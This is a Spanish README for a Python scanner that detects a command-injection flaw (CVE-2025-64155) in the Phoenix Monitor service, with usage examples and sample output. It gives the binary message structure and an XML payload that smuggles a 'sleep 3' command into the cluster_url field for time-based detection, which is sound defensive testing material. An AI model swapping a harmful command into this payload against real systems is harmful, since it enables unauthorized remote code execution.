
CVE-2025-64155-hunter
Un escáner en Python para detectar la vulnerabilidad de inyección de comandos (CVE-2025-64155) en el servicio Phoenix Monitor.
CVE-2025-64155 es una vulnerabilidad de inyección de comandos en el servicio Phoenix Monitor que permite la ejecución remota de código a través del parámetro cluster_url en el comando handleStorageRequest (ID de comando: 1075724911).
La vulnerabilidad se produce cuando la entrada controlada por el usuario en el campo cluster_url se pasa a un comando de shell sin la sanitización adecuada, lo que permite la inyección de comandos mediante metacaracteres de shell.
Este escáner se basa en la investigación del exploit realizada por Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: Dirección IP o nombre de host del objetivo (obligatorio)-p, --port: Puerto del servicio Phoenix Monitor (por defecto: 7900)--timeout: Tiempo de espera de conexión en segundos (por defecto: 10)-v, --verbose: Habilitar salida detallada (verbose)--check-only: Solo comprobar si el servicio es accesibleEl escáner utiliza un método de detección basada en tiempo:
handleStorageRequest con una carga útil maliciosa que contiene sleep 3 en el campo cluster_urlEste método es seguro y no destructivo: no ejecuta comandos dañinos, solo un comando sleep inofensivo con fines de detección.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
El escáner envía un mensaje binario con la siguiente estructura:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
La carga útil XML contiene una inyección de comandos en el campo cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Esta herramienta es únicamente para fines de investigación y pruebas de seguridad autorizadas. Utilice esta herramienta solo en sistemas de su propiedad o para los que tenga permiso explícito de prueba. El acceso no autorizado a sistemas informáticos es ilegal.
Licencia MIT: consulte el archivo LICENSE para obtener más detalles.